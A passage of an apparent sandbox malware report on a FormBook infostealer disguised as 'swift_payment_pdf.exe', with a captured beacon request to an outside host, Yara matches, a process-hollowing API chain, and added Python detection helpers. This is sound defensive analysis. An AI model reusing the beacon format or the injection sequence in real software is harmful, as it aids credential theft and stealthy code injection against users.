                Data Ascii: yle type="text/css">body,html {width: 100%; margin: 0; padding: 0;}</style></head><body><script type="text/javascript">if (document.body){document.body.style.margin = 0;document.body.style.padding = 0;}</script
                Jul 4, 2024 12:37:55.226188898 CEST | 1236 | IN | Data Raw: 3e 0a 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 23 61 75 74 6f 68 65 61 64 65 72 20 61 2c 20 23 61 75 74 6f 68 65 61 64 65 72 20 61 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 20 7d 0a 23
                Data Ascii: ><style type="text/css">#autoheader a, #autoheader a:visited { color: #FFF; }#autoheader a:hover { color: #CCC; }</style><div id="autoheader" style="width: 100%; height: 168px; background-image: url(https://app.enagicwebsystem.com/image
                Jul 4, 2024 12:37:55.226201057 CEST | 694 | IN | Data Raw: 6f 6e 67 3e 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 70 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 22 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 22 20 73 69 7a 65 3d 22
                Data Ascii: ong></font></p> <p><font face="Verdana, Arial, Helvetica, sans-serif" size="2">You may have typed the web address incorrectly. Please check the address and spelling ensuring that it does not contain capital letters or
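The GET requests captured above share one shape: a short single-segment path (/awho/), one query key carrying a base64-looking blob, a second four-character key, and a Chrome 44 on Windows 7 User-Agent that no current browser sends. The following is an added example, not part of the Joe Sandbox report: a Python triage helper that scores request lines against those observations and decodes the report's "Data Raw" hex field back to text. The sample request records are constructed from this capture (plus one benign request for contrast); the regexes are assumptions drawn from this capture only, since FormBook builds vary their path and parameter names, and the stale-UA heuristic is the editor's, not a published signature.

```python
import re
from urllib.parse import urlsplit

# Constructed sample records modelled on the requests captured in this report:
# the first is the GET to www.wwfglobal.com above, the second a benign request
# added for contrast.
SAMPLE_REQUESTS = [
    {
        "host": "www.wwfglobal.com",
        "request_line": (
            "GET /awho/?LtQxGF=HKpMDSWn02c1DGWlTfaJmDPYGspDHxl4M+sEuBij/TeAVpD3A/"
            "HhJ2RP1Yj8RhfHV3diV9uQCX+MCoKzKJx/zvHqsAsi9iTf04+ql3hj2gWbzWPZwBcwMrc="
            "&tDVH=AxaL HTTP/1.1"
        ),
        "user_agent": ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 "
                       "(KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36"),
    },
    {
        "host": "example.org",
        "request_line": "GET /index.html?page=2 HTTP/1.1",
        "user_agent": ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                       "(KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"),
    },
]

# Heuristics derived from this capture only (assumed, not a published signature).
PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")            # e.g. /awho/
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")     # long base64 blob, optional padding
SHORT_KEY_RE = re.compile(r"^[A-Za-z0-9]{4,8}$")       # LtQxGF, tDVH, AxaL
STALE_UA_RE = re.compile(r"Windows NT 6\.1\b.*Chrome/44\.")

def split_query(query):
    """Split k=v&k=v without percent-decoding: '+' and '/' in the blob must survive."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs.append((key, value))
    return pairs

def score_request(req):
    """Return the list of indicators that match this request (empty: nothing matched)."""
    _method, target, _version = req["request_line"].split(" ", 2)
    parts = urlsplit(target)
    params = split_query(parts.query)
    hits = []
    if PATH_RE.match(parts.path):
        hits.append("short single-segment path")
    if len(params) == 2:
        (k1, v1), (k2, v2) = params
        if (SHORT_KEY_RE.match(k1) and B64_RE.match(v1)
                and SHORT_KEY_RE.match(k2) and SHORT_KEY_RE.match(v2)):
            hits.append("base64 blob plus short trailing key/value")
    if STALE_UA_RE.search(req["user_agent"]):
        hits.append("stale Chrome/44 on Windows 7 User-Agent")
    return hits

def is_formbook_like(req):
    """Flag only when the URI shape and the User-Agent agree, to limit false positives."""
    hits = score_request(req)
    return len(hits) >= 2 and any("User-Agent" in h for h in hits)

def decode_data_raw(hex_field):
    """Turn a 'Data Raw' hex dump as printed in the report back into text."""
    return bytes.fromhex(hex_field.replace(" ", "")).decode("latin-1")

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["host"], is_formbook_like(req), score_request(req))
    print(decode_data_raw("4c 74 51 78 47 46 3d"))
```

The query is split by hand rather than with parse_qsl because that function turns "+" into a space and would break the base64 check on exactly the blob we care about. Feed it the request lines from the other sessions in this report to see the same three indicators fire on each beacon.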



                Target ID:0
                Start time:06:34:46
                Start date:04/07/2024
                Path:C:\Users\user\Desktop\swift_payment_pdf.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\swift_payment_pdf.exe"
                Imagebase:0xae0000
                File size:730'624 bytes
                MD5 hash:8E32F87B4F51FAC392122D3C43B2E54F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:5
                Start time:06:35:07
                Start date:04/07/2024
                Path:C:\Users\user\Desktop\swift_payment_pdf.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\swift_payment_pdf.exe"
                Imagebase:0x8c0000
                File size:730'624 bytes
                MD5 hash:8E32F87B4F51FAC392122D3C43B2E54F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                Reputation:low
                Has exited:true

                Target ID:6
                Start time:06:35:34
                Start date:04/07/2024
                Path:C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe"
                Imagebase:0x1c0000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                Target ID:7
                Start time:06:35:36
                Start date:04/07/2024
                Path:C:\Windows\SysWOW64\explorer.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\explorer.exe"
                Imagebase:0x7a0000
                File size:4'514'184 bytes
                MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:moderate
                Has exited:false

                Target ID:8
                Start time:06:35:48
                Start date:04/07/2024
                Path:C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe"
                Imagebase:0x1c0000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                Target ID:9
                Start time:06:36:00
                Start date:04/07/2024
                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                Imagebase:0x7ff6bf500000
                File size:676'768 bytes
                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true
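The Yara matches above name each memory dump by target ID and base address. As an added example (not Joe Sandbox code), the Python below parses those Source strings, joins them to the process table, and answers two responder questions: which images other than the submitted sample carry FormBook-matching regions, and which of those regions are PAGE_EXECUTE_READWRITE. The process map and dump names are copied from this report; the field layout of the dump name (target ID first, base address fourth, page protection fifth) is an assumption inferred from the names and is not documented on this page.

```python
import re
from collections import defaultdict

# Target ID -> image path, copied from the process table above.
PROCESSES = {
    0: r"C:\Users\user\Desktop\swift_payment_pdf.exe",
    5: r"C:\Users\user\Desktop\swift_payment_pdf.exe",
    6: r"C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe",
    7: r"C:\Windows\SysWOW64\explorer.exe",
    8: r"C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe",
    9: r"C:\Program Files\Mozilla Firefox\firefox.exe",
}

# Yara "Source:" dump names copied from the process table (one per distinct dump).
YARA_SOURCES = [
    "00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp",
    "00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp",
    "00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp",
    "00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp",
    "00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp",
    "00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp",
    "00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp",
]

PAGE_EXECUTE_READWRITE = 0x40  # Windows PAGE_* constant

# Assumed layout (inferred from the names above, not documented on the report page):
# <target id>.<stage>.<dump serial>.<base address>.<page protection>.<...>.sdmp
SDMP_RE = re.compile(
    r"^(?P<target>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<serial>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
)

def parse_sdmp_name(name):
    """Extract target ID, region base and page protection from a dump name."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    return {
        "target": int(m["target"], 16),
        "base": int(m["base"], 16),
        "protect": int(m["protect"], 16),
    }

def regions_by_image(sources, processes):
    """Group matching regions by the image that hosts them."""
    grouped = defaultdict(list)
    for name in sources:
        fields = parse_sdmp_name(name)
        grouped[processes[fields["target"]]].append(fields)
    return dict(grouped)

def injected_hosts(sources, processes, sample_path):
    """Images other than the submitted sample that carry a matching region."""
    return sorted(img for img in regions_by_image(sources, processes) if img != sample_path)

def rwx_hits(sources):
    """Base addresses of matching regions whose protection is PAGE_EXECUTE_READWRITE."""
    return [f["base"] for f in map(parse_sdmp_name, sources)
            if f["protect"] == PAGE_EXECUTE_READWRITE]

if __name__ == "__main__":
    for img, regions in regions_by_image(YARA_SOURCES, PROCESSES).items():
        print(img, [hex(r["base"]) for r in regions])
    print("injected into:", injected_hosts(YARA_SOURCES, PROCESSES, PROCESSES[0]))
    print("RWX regions:", [hex(b) for b in rwx_hits(YARA_SOURCES)])
```

Read against the table: target 5 (the re-spawned copy of the sample, Imagebase 0x8c0000) matches at 0x400000, below its own image base, while the matches in explorer.exe and AbWHWpocGREf.exe sit far above their image bases (0x7a0000 and 0x1c0000), the usual picture for a payload written into a foreign process. Those target ID and base pairs are the regions to pull from the sandbox before the snapshot is discarded.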


                  Execution Graph

                  Execution Coverage:8.7%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:161
                  Total number of Limit Nodes:7
                  execution_graph (161 nodes, 7 limit nodes; node list omitted). Entry 4ed9def reaches 4eda59c, 4eda5b0 and 4eda5ca, which fan out to wrappers for CreateProcessA (4ed9802, 4ed9808), VirtualAllocEx (4ed94ba, 4ed94c0), WriteProcessMemory (4ed957a, 4ed9580), ReadProcessMemory (4ed9668, 4ed9670), Wow64SetThreadContext (4ed93e2, 4ed93e8) and ResumeThread (4ed8ef8, 4ed8f00). Separate roots: 4edb768 -> 4ed7d40 -> PostMessageW (4edb9e8); 14cd040 -> GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId; 14cd690 -> DuplicateHandle.
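The execution graph above resolves the sample's wrappers to CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext and ResumeThread, the API set of a process-hollowing loader. As an added example (not from the report), the Python below checks an API trace for that chain in order, ignoring unrelated calls in between, and counts the remote writes made before the thread is resumed. The trace is constructed from the wrapper addresses the graph names, with the call order assumed; the alternative names (CreateProcessW, SetThreadContext, the Nt* variants) are added so the check generalises beyond this WOW64 sample.

```python
# Constructed API trace modelled on the execution graph above: the addresses are
# the wrapper functions the graph names, the call order is assumed for illustration.
SAMPLE_TRACE = [
    ("4ed9808", "CreateProcessA"),
    ("4ed94c0", "VirtualAllocEx"),
    ("4ed9580", "WriteProcessMemory"),
    ("4ed9580", "WriteProcessMemory"),
    ("4ed9670", "ReadProcessMemory"),
    ("4ed9580", "WriteProcessMemory"),
    ("4ed93e8", "Wow64SetThreadContext"),
    ("4ed8f00", "ResumeThread"),
]

# Ordered hollowing chain; each step lists the API names accepted for it. The
# non-Wow64 and Nt variants are added so the check is not limited to this sample.
HOLLOWING_CHAIN = (
    ("CreateProcessA", "CreateProcessW"),
    ("VirtualAllocEx", "NtAllocateVirtualMemory"),
    ("WriteProcessMemory", "NtWriteVirtualMemory"),
    ("Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"),
    ("ResumeThread", "NtResumeThread"),
)

def find_chain(trace, chain=HOLLOWING_CHAIN):
    """Return the trace indices of the first in-order occurrence of each step,
    or None when the full ordered chain is absent. Calls that belong to no
    step (ReadProcessMemory here) are skipped; only relative order matters."""
    indices = []
    pos = 0
    for accepted in chain:
        while pos < len(trace) and trace[pos][1] not in accepted:
            pos += 1
        if pos == len(trace):
            return None
        indices.append(pos)
        pos += 1
    return indices

def writes_before_resume(trace):
    """Count remote writes between process creation and the first resume.
    A hollowing loader writes headers, each section and the patched context,
    so a single write would be unusual for this pattern."""
    names = [api for _addr, api in trace]
    try:
        start = next(i for i, n in enumerate(names) if n in HOLLOWING_CHAIN[0])
        end = next(i for i, n in enumerate(names) if i > start and n in HOLLOWING_CHAIN[4])
    except StopIteration:
        return 0
    return sum(1 for n in names[start:end] if n in HOLLOWING_CHAIN[2])

def describe(trace):
    """One-line verdict suitable for a triage note."""
    hit = find_chain(trace)
    if hit is None:
        return "no hollowing chain"
    steps = " -> ".join(trace[i][1] for i in hit)
    return f"hollowing chain {steps}; {writes_before_resume(trace)} remote writes before resume"

if __name__ == "__main__":
    print(describe(SAMPLE_TRACE))
```

The same subsequence check works on a Sysmon or ETW API trace once the events are reduced to (caller, API) pairs; the point of accepting gaps between steps is that real loaders interleave ReadProcessMemory, GetThreadContext and unrelated calls, which the graph above also shows.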

                  Control-flow Graph

                  control_flow_graph 14cd030-14cd20d (edge list omitted): GetCurrentProcess in 14cd030-14cd0cf, GetCurrentThread in 14cd0d8-14cd10c, GetCurrentProcess in 14cd115-14cd149, call 14cd618 in 14cd152-14cd16d, GetCurrentThreadId in 14cd173-14cd1a2.
                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 014CD0BE
                  • GetCurrentThread.KERNEL32 ref: 014CD0FB
                  • GetCurrentProcess.KERNEL32 ref: 014CD138
                  • GetCurrentThreadId.KERNEL32 ref: 014CD191
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: a161cbaedfe9e61ec4d11a902b656454f78b67e83f7dda91dfe69a511339d3ae
                  • Instruction ID: 724f43e46e5e841db2d545b75f192e059785f3efc9ded0351302548d8fa23ed3
                  • Opcode Fuzzy Hash: a161cbaedfe9e61ec4d11a902b656454f78b67e83f7dda91dfe69a511339d3ae
                  • Instruction Fuzzy Hash: 155154B4D003498FDB54DFAAD548B9EBBF1AF88304F20846ED419A73A0DB749984CB65

                  Control-flow Graph

                  control_flow_graph 14cd040-14cd20d (edge list omitted): GetCurrentProcess in 14cd040-14cd0cf, GetCurrentThread in 14cd0d8-14cd10c, GetCurrentProcess in 14cd115-14cd149, call 14cd618 in 14cd152-14cd16d, GetCurrentThreadId in 14cd173-14cd1a2.
                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 014CD0BE
                  • GetCurrentThread.KERNEL32 ref: 014CD0FB
                  • GetCurrentProcess.KERNEL32 ref: 014CD138
                  • GetCurrentThreadId.KERNEL32 ref: 014CD191
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: e4412e6100f73db32eb2742f572c939c7049d46265feb9048cf56c93e3569ac0
                  • Instruction ID: b50eb08482f50072d3bf3059027474e6fc154c2f08495231f85bf20cc47c1d00
                  • Opcode Fuzzy Hash: e4412e6100f73db32eb2742f572c939c7049d46265feb9048cf56c93e3569ac0
                  • Instruction Fuzzy Hash: BB5166B4D003498FDB54DFAAD548B9EBBF1AF88314F20846ED409A73A0DB746984CB61

                  Control-flow Graph

                  control_flow_graph 4ed9802-4ed9b4d (edge list omitted): CreateProcessA in 4ed9997-4ed9a51; no other API calls in the remaining blocks.
                  APIs
                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04ED9A3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 233a89843cacbd01c0fe16c8df6a1d5da7c6d61acbce1ee2e5532d36ce38558b
                  • Instruction ID: a9c45b853e6e777b7be806bdfd6315f9a5d59d83cb5b90dd3fb5f21175091cdd
                  • Opcode Fuzzy Hash: 233a89843cacbd01c0fe16c8df6a1d5da7c6d61acbce1ee2e5532d36ce38558b
                  • Instruction Fuzzy Hash: C9918CB1D002199FEB20DF68CC417DDBBB2FF48314F149169E849A7285DB74A986CF91

                  Control-flow Graph

                  control_flow_graph 4ed9808-4ed9b4d (edge list omitted): CreateProcessA in 4ed9997-4ed9a51; no other API calls in the remaining blocks.
                  APIs
                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04ED9A3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 503c5f7891a3168a1e389e93db09727e5c5c0a2522c49a5d7e7faa4147d26ffb
                  • Instruction ID: ce45400ca8063711ba38ab928b6c2011cd98872b7b9dc9e600bc6c4cb5229095
                  • Opcode Fuzzy Hash: 503c5f7891a3168a1e389e93db09727e5c5c0a2522c49a5d7e7faa4147d26ffb
                  • Instruction Fuzzy Hash: 4A917CB1D002199FEB20DF68CC417DDBBB2FF48314F149169E849A7285DB74A986CF91

                  Control-flow Graph

                  control_flow_graph 14cada8-14cb028 (edge list omitted): internal calls to 14ca0cc, 14cb040 or 14cb031, 14ca0d8, 14ca0e8, 14ca0f8 and 14ca108; GetModuleHandleW in 14cafe0-14cb00b.
                  APIs
                  • GetModuleHandleW.KERNELBASE(00000000), ref: 014CAFFE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: 53ef008237b47d66a95899f1a2e0e35595ee07103ead90aabf69971b13b59728
                  • Instruction ID: 031fd312aae9c32bbddc7c8f9ffa10e0794727123e516aaec407db8c81955a15
                  • Opcode Fuzzy Hash: 53ef008237b47d66a95899f1a2e0e35595ee07103ead90aabf69971b13b59728
                  • Instruction Fuzzy Hash: 5D8158B4A00B098FD764DF6AD04475ABBF1FF88704F10892ED18A97B60E735E846CB90

                  Control-flow Graph

                  control_flow_graph 14c590d-14c5a61 (edge list omitted): CreateActCtxA in 14c5918-14c59d9; no other API calls in the remaining blocks.
                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 014C59C9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0
                  • Opcode ID: ddfb3d14b9b26a895f268964ca2858b7c74d444b7a82dc010eae5f13cb7533bb
                  • Instruction ID: 2953df27401d46195d581b540550bba596a2af19e8a18f7b3d9435325e37909b
                  • Opcode Fuzzy Hash: ddfb3d14b9b26a895f268964ca2858b7c74d444b7a82dc010eae5f13cb7533bb
                  • Instruction Fuzzy Hash: C841D1B4D0071DCBDB24DFAAC884BCEBBB5BF49704F20806AD409AB251DB756945CF90

                  Control-flow Graph (rendered graph not reproduced; the function calls CreateActCtxA)
                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 014C59C9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1912228458.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_14c0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0
                  • Opcode ID: f3094e8f7146fdcf71cde5a349d09f15e5b09f4755f2e0cebdc5781658faae0f
                  • Instruction ID: c070e3cc056ef3accd92822577e9acaaee57ee26541a20247d4ef141984722b0
                  • Opcode Fuzzy Hash: f3094e8f7146fdcf71cde5a349d09f15e5b09f4755f2e0cebdc5781658faae0f
                  • Instruction Fuzzy Hash: 3541F2B4D0071DCBDB24DFAAC884BDEBBB5BF49704F20805AD409AB251DB75A945CF90

                  Control-flow Graph (rendered graph not reproduced; the function calls WriteProcessMemory)
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04ED9610
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: 1780aae03d703de3f05625f76342235e1b6604fafe8336cb0635e5db57e6b6aa
                  • Instruction ID: 80b46db0d3ad51225a07ef2de546c75e8a6a03e7bfc6dc1dc9ac5bda045c269e
                  • Opcode Fuzzy Hash: 1780aae03d703de3f05625f76342235e1b6604fafe8336cb0635e5db57e6b6aa
                  • Instruction Fuzzy Hash: 81217AB5D003099FCB10DFAAC881BDEBBF5FF48314F10842AE518A7241C778A945CBA0

                  Control-flow Graph (rendered graph not reproduced; the function calls WriteProcessMemory)
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04ED9610
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: 53c978301ba784de35c801975389787cf47f9022e6d58d2e8bebd89bf80e8a56
                  • Instruction ID: 023de6e307170f69ec4fe1ec3f02e2544316f884a6977ba1bbe77fa9569546fa
                  • Opcode Fuzzy Hash: 53c978301ba784de35c801975389787cf47f9022e6d58d2e8bebd89bf80e8a56
                  • Instruction Fuzzy Hash: EC2169B59003099FCB10DFAAC885BDEBBF5FF48310F10842AE959A7241C778A945CBA4

                  Control-flow Graph (rendered graph not reproduced; the function calls ReadProcessMemory)
                  APIs
                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04ED96F0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: cde33ff8e448614dd0f2a39030df5409feeb622abf69bb93c49b8ceaf67aea3c
                  • Instruction ID: 6f3662d0eff38c3d591e1078c64715a9b7a99e03be8fb1fd5b5466c14ddd8807
                  • Opcode Fuzzy Hash: cde33ff8e448614dd0f2a39030df5409feeb622abf69bb93c49b8ceaf67aea3c
                  • Instruction Fuzzy Hash: 2F214AB5D003499FDB10DFAAC881ADEFBF5FF48320F508429E559A3241C738A945CBA1

                  Control-flow Graph (rendered graph not reproduced; the function calls Wow64SetThreadContext)
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04ED9466
                  Memory Dump Source
                  • Source File: 00000000.00000002.1914752604.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_4ed0000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 2c3c6facd7b5e884f7172e92e4a1f0812e4aa2011ba79023df806d284a6207bf
                  • Instruction ID: 9633d6e536094d1b5c600df22454df7e1f98b4dbc5523d19678d876fbd8ecec3
                  • Opcode Fuzzy Hash: 2c3c6facd7b5e884f7172e92e4a1f0812e4aa2011ba79023df806d284a6207bf
